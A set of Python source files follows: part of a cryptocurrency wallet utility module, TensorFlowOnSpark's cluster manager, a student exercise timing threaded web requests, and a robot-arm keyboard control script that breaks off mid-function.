pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid AXE address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='axe', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
TFCluster.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
import pydoop.hdfs as hdfs
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None
defaultFS = None
working_dir = None
num_executors = None
nodeRDD = None
cluster_id = None
cluster_info = None
cluster_meta = None
input_mode = None
queues = None
server = None
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = []
for i in range(num_epochs):
rdds.append(dataRDD)
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
if node['job_name'] == 'ps':
ps_list.append(node)
else:
worker_list.append(node)
if ssc is not None:
# Spark Streaming
done = False
while not done:
done = ssc.awaitTerminationOrTimeout(1)
if not done and self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
done = done or self.server.done
else:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
if self.input_mode == InputMode.TENSORFLOW:
count = 0
done = False
while not done:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) > 0:
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
done = (count >= 3)
time.sleep(5)
else:
done = True
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
done = False
while not done:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""
Utility function to get Tensorboard URL
"""
tb_url = None
for node in self.cluster_info:
if node['tb_port'] != 0 and node['job_name'] == 'worker' and node['task_index'] == 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
return tb_url
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
#in hopsworks we want the tensorboard to always be true:
tb=True
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tb else ""))
assert num_ps < num_executors
if driver_ps_nodes:
raise Exception('running PS nodes on driver is not supported and not needed on Hops Hadoop, since we have GPU scheduling.')
if log_dir:
raise Exception('No need to specify log_dir directory, we save TensorBoard events in the directory returned by tensorboard.logdir for you')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
nodeRDD = sc.parallelize(range(num_executors), num_executors)
app_id = sc.applicationId
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tb,
None,
app_id,
0,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to check GPU presence
logging.info("Waiting for GPU presence check to start")
gpus_present = server.await_gpu_check()
logging.info("All GPU checks completed")
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
Assignment5.py
|
import queue
import time
import threading
from urllib.request import urlopen, Request
from concurrent.futures import ThreadPoolExecutor
from queue import Queue
# https://www.geeksforgeeks.org/how-to-use-threadpoolexecutor-in-python3/
# Threading allows parallelism of code and Python language has two ways to achieve its 1st is via multiprocessing
# module and 2nd is via multithreading module. Multithreading is well suited to speed up I/O bound tasks like
# making a web request, or database operations, or reading/writing to a file. In contrast to this CPU intensive
# tasks like mathematical computational tasks are benefited the most using multiprocessing.
# This happens due to GIL (Global Interpreter Lock).
# Header with user agent is needed to allow access for scraping
HEADER = {'User-Agent': 'Mozilla/5.0'}
URLS = ['https://www.volvocars.com/se',
'https://consid.se/',
'https://stackoverflow.com/',
'https://9gag.com/',
'https://www.yahoo.com',
'https://www.reddit.com',
'https://www.youtube.com',
'https://9gag.com/',
'https://twitter.com/',
'https://www.volvocars.com/se',
'https://consid.se/',
'https://www.reddit.com',
'https://www.youtube.com',
'https://stackoverflow.com',
'https://www.aftonbladet.se/',
'https://www.volvocars.com/se',
'https://www.aftonbladet.se/',
'https://www.volvocars.com/se',
'https://www.yahoo.com',
'https://consid.se/',
'https://www.youtube.com',
'https://9gag.com/',
'https://stackoverflow.com/',
'https://www.volvocars.com/se',
'https://www.yahoo.com',
'https://www.reddit.com/',
'https://consid.se/',
'https://9gag.com/',
'https://twitter.com/',
'https://stackoverflow.com/',
'https://www.aftonbladet.se/',
'https://twitter.com/']
def timer(func):
# Timer is a function you might recognize from last week's assignment but
# with a slight modification, this time the decorator returns the execution
# time as well as printing it. This is for gathering the runtime such that
# the functions performances can be compared in the main function
def timer_wrapper(*args):
start = time.time()
func(*args)
end = time.time()
exec_time = end-start
print(f"Execution time: {(exec_time):.7f} seconds ({func.__name__})")
return exec_time
return timer_wrapper
def request_and_open(URL):
# request_and_open sends a request to a URL and fetches the information.
# The functions return value is currently unused and simply there in case
# of if you want to toy around with the information gathered or maybe
# continue building upon the assignment afterwards.
request = Request(URL, headers=HEADER)
url_info_byte = urlopen(request, timeout=20).read()
url_info_string = url_info_byte.decode("utf-8")
return url_info_string # not used..
@timer
def request_single():
for url in URLS:
request_and_open(url)
@timer
def request_pool(num_threads):
# https://www.geeksforgeeks.org/how-to-use-threadpoolexecutor-in-python3/
# In the request_pool function implement a ThreadPoolExecutor. The executor
# is a context manager so use it as such. The executor should then map the
# urls to the request_and_open function using map
with ThreadPoolExecutor(num_threads) as executor:
executor.map(request_and_open, URLS)
@timer
def request_queue(num_threads):
# Create a queue object and put all the urls into it
queue = Queue()
for url in URLS:
queue.put(url)
def worker(queue):
# Define a worker function inside the request_queue function that takes as
# input the queue and calls the request_and_open function. The queue
# should then mark this task as done
while not queue.empty():
request_and_open(queue.get())
queue.task_done()
# Create threads up to the num_threads and place the threads to work on the
# worker queue function. Start the threads ..
for _ in range(num_threads):
threading.Thread(target=worker, args=(queue,)).start()
# .. and then make the main thread wait for the queue to join.
queue.join()
def main():
num_threads = [2, 4, 8, 16, 32, 8192]
num_iterations = 3
mean_times_pool = []
mean_times_queue = []
print(f"Number of threads: 1. Executing...")
# Main runs the three different request functions and gathers the runtime
# for each of the functions
total_time_single = sum(request_single() for _ in range(num_iterations))
# and then obtains the mean runtime by dividing
# with the number of iterations.
mean_time_single = total_time_single/num_iterations
for i in num_threads:
# In the for-loop that iterates over num_threads the request_pool and
# request_queue functions are called using varying number of threads.
# This is one of the main focuses of the assignment, which is to judge
# how number of threads improve or decreases performance and compare
# the Threadpool approach with the queue.
print(f"Number of threads: {i}. Executing...")
total_time_pool = sum(request_pool(i) for _ in range(num_iterations))
total_time_queue = sum(request_queue(i) for _ in range(num_iterations))
mean_times_pool.append(total_time_pool/num_iterations)
mean_times_queue.append(total_time_queue/num_iterations)
print(f"The mean time using single thread: {mean_time_single}")
print(f"The mean times using thread pool executor are: {mean_times_pool}")
print(f"The mean times using queue.Queue workers are: {mean_times_queue}")
if __name__ == "__main__":
main()
'''
Output:
The mean time using single thread: 19.091560920079548
num_threads:
>> [2, 4, 8, 16, 32, 8192]
The mean times using thread pool executor are:
>> [8.89, 5.34, 3.10, 2.44, 4.09, 4.63]
The mean times using queue.Queue workers are:
>> [9.80, 7.51, 3.69, 3.65, 4.77, 10.76]
Snabbast här är : ThreadPoolExecutor och 16 threads
'''
|
touch.py
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
import time
import cv2
from robot import Robot
import threading
import os
import utils
class HumanControlOfRobot(object):
"""Creates a color and depth opencv window from the robot camera, gets human keyboard/click, and moves the robot.
Keyboard Controls:
'c': set self.stop to True indicating it is time to exit the program.
'a': autonomous mode, sets self.human_control = False, clicks will have no effect (unless move_robot=False).
'z': human control mode, sets self.human_control = True, clicks will move the robot (unless move_robot=False).
'h': go home.
'j': stay in place after pushing, grasping, and placing (self.go_home=False).
'm': Automatically home when pushing, grasping, and placing (self.go_home=True).
'g': set self.action = 'grasp', left click in the 'color' image window will do a grasp action.
'p': set self.action = 'place', left click will do a place action.
's': set self.action = 'push', left click will slide the gripper across the ground, aka a push action.
't': set self.action = 'touch', left click will do a touch action (go to a spot and stay there).
'r': repeat the previous action and click location after applying any settings changes you made to action/angle.
'1-9': Set the gripper rotation orientation at 45 degree increments, starting at the angle 0. Default is '5'.
'b': set self.action = box, left click will move the robot to go get the box and dump the objects inside.
'[': set self.robot.place_task = False, a successful grasp will immediately drop objects in the box.
']': set self.robot.place_task = True, a successful grasp will hold on to objects so the robot can place them.
' ': print the current robot cartesian position with xyz and axis angle and the current joint angles.
'-': close gripper
'=': open gripper
'k': calibrate with the ros api in calibrate_ros.py
Member Variables:
self.stop: if True shut down your program, pressing 'c' on the keyboard sets this variable to True.
"""
def __init__(self, robot=None, action='touch', human_control=True, mutex=None, move_robot=True):
self.stop = False
self.print_state_count = 0
self.tool_orientation = [0.0, np.pi, 0.0] # Real Good Robot
self.human_control = human_control
self.move_robot = move_robot
self.action = action
self.click_count = 0
self.click_position = None
self.target_position = None
# go home automatically during push, grasp place actions
self.go_home = True
self.calib = None
if robot is None:
# workspace_limits = np.asarray([[0.3, 0.748], [-0.224, 0.224], [-0.255, -0.1]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
# self.tool_orientation = [2.22,-2.22,0]
# ---------------------------------------------
# Move robot to home pose
self.robot = Robot(False, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None)
robot.open_gripper()
else:
self.robot = robot
# Slow down robot
# robot.joint_acc = 1.4
# robot.joint_vel = 1.05
self.grasp_angle = 4.0
self.grasp_success, self.grasp_color_success = False, False
if mutex is None:
self.mutex = threading.Lock()
# Callback function for clicking on OpenCV window
self.click_point_pix = ()
# wait a second for things to initialize
time.sleep(1)
self.camera_color_img, self.camera_depth_img = robot.get_camera_data(go_home=False)
def mouseclick_callback(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN or event == cv2.EVENT_RBUTTONDOWN:
# global camera, robot, self.click_point_pix, action, self.grasp_angle, self.grasp_success, self.grasp_color_success, self.mutex
self.click_point_pix = (x,y)
# Get click point in camera coordinates
click_z = self.camera_depth_img[y][x] * robot.cam_depth_scale * 1000 # unit from m -> mm
click_x = np.multiply(x-robot.cam_intrinsics[0][2],click_z/robot.cam_intrinsics[0][0])
click_y = np.multiply(y-robot.cam_intrinsics[1][2],click_z/robot.cam_intrinsics[1][1])
if click_z == 0:
print('Click included invalid camera data, ignoring the command.')
return
click_point = np.asarray([click_x,click_y,click_z]) / 1000 # Convert from unit from mm to m
click_point.shape = (3,1)
# Convert camera to robot coordinates
# camera2robot = np.linalg.inv(robot.cam_pose)
camera2robot = robot.cam_pose # The transformation matrix is from meter to meter
target_position = np.dot(camera2robot[0:3,0:3],click_point) + camera2robot[0:3,3:]
target_position = target_position[0:3,0]
heightmap_rotation_angle = self.grasp_angle * np.pi / 4
# print(target_position, self.tool_orientation)
if not self.human_control:
print('Human Control is disabled, press z for human control mode, a for autonomous mode')
with self.mutex:
self.click_position = target_position.copy()
self.target_position, heightmap_rotation_angle = self.execute_action(target_position, heightmap_rotation_angle)
# Show color and depth frames
cv2.namedWindow('depth')
cv2.namedWindow('color')
cv2.setMouseCallback('color', mouseclick_callback)
self.print_config()
def execute_action(self, target_position, heightmap_rotation_angle):
self.target_position = target_position
self.click_count += 1
print(str(self.click_count) + ': action: ' + str(self.action) + ' pos: ' + str(target_position) + ' rot: ' + str(heightmap_rotation_angle))
def grasp(tp, ra, gh):
# global self.grasp_success, self.grasp_color_success, self.mutex
with self.mutex:
self.grasp_success, self.grasp_color_success = robot.grasp(tp, ra, go_home=gh)
def place(tp, ra, gh):
# global self.grasp_success, self.mutex
with self.mutex:
self.robot.place(tp, ra, go_home=gh)
self.grasp_success = False
if self.action == 'touch':
# Move the gripper up a bit to protect the gripper (Real Good Robot)
def move_to(tp, ra):
# global self.mutex
tp = tp.copy()
# move to a spot just above the clicked spot to avoid collision
tp[-1] += 0.04
with self.mutex:
# self.robot.move_to(target_position, self.tool_orientation)
self.robot.move_to(tp, heightmap_rotation_angle=ra)
if self.move_robot:
t = threading.Thread(target=move_to, args=(target_position, heightmap_rotation_angle))
t.start()
elif self.action == 'grasp':
if not self.robot.place_task or (robot.place_task and not self.grasp_success):
if self.move_robot:
t = threading.Thread(target=grasp, args=(target_position, heightmap_rotation_angle, self.go_home))
t.start()
else:
if self.move_robot:
t = threading.Thread(target=place, args=(target_position, heightmap_rotation_angle, self.go_home))
t.start()
elif self.action == 'box':
t = threading.Thread(target=lambda: self.robot.restart_real())
t.start()
elif self.action == 'push':
target_position[-1] += 0.01
t = threading.Thread(target=lambda: self.robot.push(target_position, heightmap_rotation_angle, go_home=self.go_home))
t.start()
elif self.action == 'place':
target_position[-1] += 0.01
t = threading.Thread(target=lambda: self.robot.place(target_position, heightmap_rotation_angle, go_home=self.go_home))
t.start()
return target_position, heightmap_rotation_angle
def print_config(self):
# global robot
state_str = 'Current action: ' + str(self.action) + '. '
state_str += 'Grasp, HOLD, PLACE object task, ' if self.robot.place_task else 'Grasp then drop in box task, '
state_str += 'robot WILL go home after push/grasp/place' if self.go_home else 'robot will NOT go home after push/grasp/place'
print(state_str)
def run_one(self, camera_color_img=None, camera_depth_img=None):
if camera_color_img is None:
shape = [0, 0, 0, 0]
# get the camera data, but make sure all the images are valid first
while not all(shape):
self.camera_color_img, self.camera_depth_img = self.robot.get_camera_data(go_home=False)
shape = self.camera_color_img.shape + self.camera_depth_img.shape
else:
self.camera_color_img = camera_color_img
self.camera_depth_img = camera_depth_img
if len(self.click_point_pix) != 0:
self.camera_color_img = cv2.circle(self.camera_color_img, self.click_point_pix, 7, (0,0,255), 2)
self.camera_color_img = cv2.cvtColor(self.camera_color_img, cv2.COLOR_RGB2BGR)
cv2.imshow('color', self.camera_color_img)
cv2.imshow('depth', self.camera_depth_img)
key = cv2.waitKey(1)
# Configure the system
# Numbers 1-9 are orientations of the gripper
# t is touch mode, where the robot will go to the clicked spot
if key == ord('1'):
self.grasp_angle = 0.0
elif key == ord('2'):
self.grasp_angle = 1.0
elif key == ord('3'):
self.grasp_angle = 2.0
elif key == ord('4'):
self.grasp_angle = 3.0
elif key == ord('5'):
self.grasp_angle = 4.0
elif key == ord('6'):
self.grasp_angle = 5.0
elif key == ord('7'):
self.grasp_angle = 6.0
elif key == ord('8'):
self.grasp_angle = 7.0
elif key == ord('9'):
self.grasp_angle = 8.0
elif key == ord('t'):
self.action = 'touch'
self.print_config()
elif key == ord('g'):
self.action = 'grasp'
self.print_config()
elif key == ord('s'):
self.action = 'push'
self.print_config()
elif key == ord('p'):
self.action = 'place'
self.print_config()
elif key == ord('b'):
self.action = 'box'
self.print_config()
elif key == ord('r'):
heightmap_rotation_angle = self.grasp_angle * np.pi / 4
with self.mutex:
self.target_position, heightmap_rotation_angle = self.execute_action(self.click_position.copy(), heightmap_rotation_angle)
elif key == ord(']'):
with self.mutex:
# Mode for stacking blocks
self.robot.place_task = True
self.print_config()
elif key == ord('['):
with self.mutex:
# Mode for grasping to hold and then place
self.robot.place_task = False
self.print_config()
elif key == ord(' '):
with self.mutex:
# print the robot state
self.print_state_count += 1
state_data = self.robot.get_state()
actual_tool_pose = self.robot.parse_tcp_state_data(state_data, 'cartesian_info')
robot_state = 'UR5 axis/angle cart_pose format: ' + str(actual_tool_pose)
actual_tool_pose = utils.axis_angle_and_translation_to_rigid_transformation(actual_tool_pose[:3], actual_tool_pose[3:])
joint_position = self.robot.parse_tcp_state_data(state_data, 'joint_data')
robot_state += ' joint pos: ' + str(joint_position) + ' homogeneous cart_pose: ' + str(actual_tool_pose)
print(str(self.print_state_count) + ' ' + robot_state)
elif key == ord('c'):
self.stop = True
elif key == ord('h'):
with self.mutex:
t = threading.Thread(target=lambda: self.robot.go_home())
t.start()
elif key == ord('-'):
with self.mutex:
t = threading.Thread(target=lambda:
print('fully closed: ' + str(self.robot.close_gripper()) + ' obj detected: ' + str(self.robot.gripper.object_detected())))
t.start()
elif key == ord('='):
with self.mutex:
t = threading.Thread(target=lambda: self.robot.open_gripper())
t.start()
elif key == ord('m'):
self.go_home = True
self.print_config()
elif key == ord('j'):
self.go_home = False
self.print_config()
elif key == ord('z'):
self.human_control = True
elif key == ord('a'):
self.human_control = False
elif key == ord('k'):
from calibrate_ros import Calibrate
robot.camera.subscribe_aruco_tf()
robot.go_home()
calib = Calibrate(robot=self.robot)
# calib.test()
calib.calibrate()
# def calibration():
# from calibrate_ros import Calibrate
# robot.camera.subscribe_aruco_tf()
# robot.go_home()
# calib = Calibrate(robot=self.robot)
# # calib.test()
# calib.calibrate()
# with self.mutex:
# t = threading.Thread(target=calibration)
# t.start()
def run(self):
""" Blocking call that repeatedly calls run_one()
"""
while not hcr.stop:
hcr.run_one()
def get_action(self, camera_color_img=None, camera_depth_img=None, prev_click_count=None, block=True):
""" Get a human specified action
# Arguments
camera_color_img: show the human user a specific color image
camera_depth_img: show the human user a specific depth image
prev_click_count: pass the click count you saw most recently, used to determine if the user clicked in between calls to get_action.
block: when True this function will loop and get keypresses via run_one() until a click is received, when false it will just immediately return the current state.
# Returns
[action_name, target_position, grasp_angle, cur_click_count, camera_color_img, camera_depth_img]
"""
running = True
if prev_click_count is None:
with self.mutex:
prev_click_count = self.click_count
while running:
self.run_one(camera_color_img, camera_depth_img)
with self.mutex:
